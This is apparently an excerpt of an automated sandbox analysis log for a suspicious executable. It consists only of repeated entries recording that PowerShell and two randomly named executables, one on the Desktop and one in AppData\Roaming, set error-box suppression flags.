              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
